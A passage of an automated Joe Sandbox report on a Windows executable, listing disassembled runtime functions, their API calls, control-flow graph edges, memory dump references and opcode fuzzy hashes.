                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: 26238c2e26fe11b5dd28e2edceea188fc7e899d5cf6690fdc612c94b7bf022f2
                                                                                                                                                                                                                          • Instruction ID: 101781c4f2b699e765868135dd38c4f1c1251a900781384f408d35ba28d4b7ec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26238c2e26fe11b5dd28e2edceea188fc7e899d5cf6690fdc612c94b7bf022f2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89C1F172A1C68F91EBA2BB5594102BE7BD0FB90B80F550131DA4E83BD1CE7CE8578316
                                                                                                                                                                                                                          Function 00007FF641F233E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,00007FF641F23534), ref: 00007FF641F23411
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F229E0: GetLastError.KERNEL32(?,?,?,00007FF641F2342E,?,00007FF641F23534), ref: 00007FF641F22A14
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F229E0: FormatMessageW.KERNEL32(?,?,?,00007FF641F2342E), ref: 00007FF641F22A7D
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F229E0: MessageBoxW.USER32 ref: 00007FF641F22ACF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                                                                                                                                          • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                          • API String ID: 517058245-2863816727
                                                                                                                                                                                                                          • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                          • Instruction ID: f1e14e5795f950f91e9bfbd4dfbd519f084b6c86a3b3b691a430538115aa4bf7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9521B0A1B1C58281FBA3BB24E9013FA22D0BF98384F800232D65DC75E6EE2DE1068301
                                                                                                                                                                                                                          Function 00007FF641F3EC9C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1022 7ff641f3ec9c-7ff641f3ecd8 1023 7ff641f3ee8e-7ff641f3ee99 call 7ff641f343f4 1022->1023 1024 7ff641f3ecde-7ff641f3ece7 1022->1024 1029 7ff641f3ee9d-7ff641f3eeb9 call 7ff641f2b870 1023->1029 1024->1023 1025 7ff641f3eced-7ff641f3ecf6 1024->1025 1025->1023 1027 7ff641f3ecfc-7ff641f3ecff 1025->1027 1027->1023 1030 7ff641f3ed05-7ff641f3ed16 1027->1030 1032 7ff641f3ed18-7ff641f3ed21 call 7ff641f3ec40 1030->1032 1033 7ff641f3ed40-7ff641f3ed44 1030->1033 1032->1023 1040 7ff641f3ed27-7ff641f3ed2a 1032->1040 1033->1023 1035 7ff641f3ed4a-7ff641f3ed4e 1033->1035 1035->1023 1037 7ff641f3ed54-7ff641f3ed58 1035->1037 1037->1023 1039 7ff641f3ed5e-7ff641f3ed6e call 7ff641f3ec40 1037->1039 1045 7ff641f3ed77 call 7ff641f454a4 1039->1045 1046 7ff641f3ed70-7ff641f3ed73 1039->1046 1040->1023 1041 7ff641f3ed30-7ff641f3ed33 1040->1041 1041->1023 1043 7ff641f3ed39 1041->1043 1043->1033 1049 7ff641f3ed7c-7ff641f3ed93 call 7ff641f448a8 1045->1049 1046->1045 1047 7ff641f3ed75 1046->1047 1047->1045 1052 7ff641f3ed99-7ff641f3eda4 call 7ff641f448d8 1049->1052 1053 7ff641f3eeba-7ff641f3eecf call 7ff641f39c10 1049->1053 1052->1053 1058 7ff641f3edaa-7ff641f3edb5 call 7ff641f44908 1052->1058 1058->1053 1061 7ff641f3edbb-7ff641f3ee4f 1058->1061 1062 7ff641f3ee89-7ff641f3ee8c 1061->1062 1063 7ff641f3ee51-7ff641f3ee6d 1061->1063 1062->1029 1064 7ff641f3ee6f-7ff641f3ee73 1063->1064 1065 7ff641f3ee84-7ff641f3ee87 1063->1065 1064->1065 1066 7ff641f3ee75-7ff641f3ee80 call 7ff641f454e8 1064->1066 1065->1029 1066->1065
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4170891091-0
                                                                                                                                                                                                                          • Opcode ID: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
                                                                                                                                                                                                                          • Instruction ID: 6cff7036f5c92209949a72643f0579714840af396a243bcfe636c0d5a5be222f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6511372F0861A8AEB95FF6499552BC27E1AF10798F110135DD1E93EE6DF38A443C702
                                                                                                                                                                                                                          Function 00007FF8B8316110 Relevance: 6.1, APIs: 4, Instructions: 129COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2281899798.00007FF8B8301000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8B8300000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2281800474.00007FF8B8300000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282049596.00007FF8B83B5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282199485.00007FF8B83EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282289251.00007FF8B83F2000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8b8300000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$__security_init_cookie
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2222513578-0
                                                                                                                                                                                                                          • Opcode ID: d32f32be829c345f8424b6e50172c33a4feb856c6a1ec6dc64b44a65f2bf0592
                                                                                                                                                                                                                          • Instruction ID: c2ca61d711092ae3e39f99b9fd34e8f8a558f289c1622a4ab68342770e3c2706
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d32f32be829c345f8424b6e50172c33a4feb856c6a1ec6dc64b44a65f2bf0592
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12515D20E0C64342FA9977EDD95517A51919F4DBE0F1C4638DB2E06AD7EF2DB8838708
                                                                                                                                                                                                                          Function 00007FF641F34A8C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2780335769-0
                                                                                                                                                                                                                          • Opcode ID: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
                                                                                                                                                                                                                          • Instruction ID: 53cff9c26b31722431c03e534cee2c21a71ba83ca0f055b91b7fcecc594d4744
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99517822A0C6458AFB95FFB1D4403BD23E1AB48B98F148135DE0987A89DF38D4838752
                                                                                                                                                                                                                          Function 00007FF641F34938 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1279662727-0
                                                                                                                                                                                                                          • Opcode ID: c9c3dc0ca6ff3025a18f37416ed5252826b5e2a6b8668c561ba6737191909872
                                                                                                                                                                                                                          • Instruction ID: 4040b9923be3e93d8bd9114e31f88e817aa0b24e0a5af294847f2ca812f45ac0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c9c3dc0ca6ff3025a18f37416ed5252826b5e2a6b8668c561ba6737191909872
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D41A122D1C78643F795BBA0D54036962A0FBA47A4F109334E69D83ED6DF6CA1E38705
                                                                                                                                                                                                                          Function 00007FF8B831CA40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF8B830DCF0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF8B83134C9,?,?,?,00007FF8B83539B1,?,?,?,?,00007FF8B83178EA,?,?,?), ref: 00007FF8B830DD38
                                                                                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF8B831F39E,?,?,?,?,?,00007FF8B831F0A6), ref: 00007FF8B8355B8C
                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,?,00007FF8B831F39E,?,?,?,?,?,00007FF8B831F0A6), ref: 00007FF8B8355BA2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2281899798.00007FF8B8301000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8B8300000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2281800474.00007FF8B8300000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282049596.00007FF8B83B5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282199485.00007FF8B83EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282289251.00007FF8B83F2000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8b8300000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressAllocCountCriticalHeapInitializeProcSectionSpin
                                                                                                                                                                                                                          • String ID: InitializeCriticalSectionEx
                                                                                                                                                                                                                          • API String ID: 1188775705-3084827643
                                                                                                                                                                                                                          • Opcode ID: d50c9835e02574957e0a21de02abdf2f731f597d5daf9e2beef02907001a061a
                                                                                                                                                                                                                          • Instruction ID: 5084107b5da655707eecee163dd94cd577e372775673c9b5efc36ec17bd9273a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d50c9835e02574957e0a21de02abdf2f731f597d5daf9e2beef02907001a061a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF41AC62B19B4286EA149B5DD4142B933A0AB48BA0F4C4335DB6D477C4DF3CF917C308
                                                                                                                                                                                                                          Function 00007FF641F2BF5C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3251591375-0
                                                                                                                                                                                                                          • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                                          • Instruction ID: 675b66790f364f538da22db98ad6d6ecc0820223435f8e1ddf0d839f3399cdc4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7314D39E4D68741FBE6FB6494123F913C1AF82784F940035E90EC76D7EE2EA9478215
                                                                                                                                                                                                                          Function 00007FF641F38D48 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                          • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                          • Instruction ID: 60c450ef61f47b9ced75b986fde826f1f04bf96ab2ee56ff5c4ac135ec4324c6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81D06720F6C60A87EB963F715D6917912915FA8701B502538D84A877D3CD2CA80B4345
                                                                                                                                                                                                                          Function 00007FF641F2F45C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
                                                                                                                                                                                                                          • Instruction ID: cac679e86ffda5a4bc88c4ceec7fe49bc8ecb48b84267d7e0491c92ed747f9d7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C51D161B2D2C246EBAABF3694106BA66C1FF84BB4F144634DD6D87BD5CE3DE4038601
                                                                                                                                                                                                                          Function 00007FF641F3B444 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                                                                                          • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                          • Instruction ID: f128860154aa27e4d48308c8272b7740cf3e3c34ce5dcea41019620460c01a14
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B411C471A1CA8581DB91BB25E81417D63A1AB44BF4F544331EE7D87BEACE3CD0538709
                                                                                                                                                                                                                          Function 00007FF641F34C34 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF641F34B49), ref: 00007FF641F34C67
                                                                                                                                                                                                                          • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF641F34B49), ref: 00007FF641F34C7D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1707611234-0
                                                                                                                                                                                                                          • Opcode ID: 5814b874014510fcf00941fef2b2171ed045486f006683dc2ae422325307d6da
                                                                                                                                                                                                                          • Instruction ID: fed6e6f6fad72cd7e93c34006b96b0df5a44a195bbb750e261087ec2eb9c865e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5814b874014510fcf00941fef2b2171ed045486f006683dc2ae422325307d6da
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D118F3160CA5681EBA5BB51E41117EB7E0FB817A5F500235EAADC2DD8EF2CD056DB00
                                                                                                                                                                                                                          Function 00007FF641F39C58 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C6E
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C78
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                                                          • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                          • Instruction ID: b6fc17f82ea6f7610bc2def2649a33250c391972a1e21e598bf871a10d6cc251
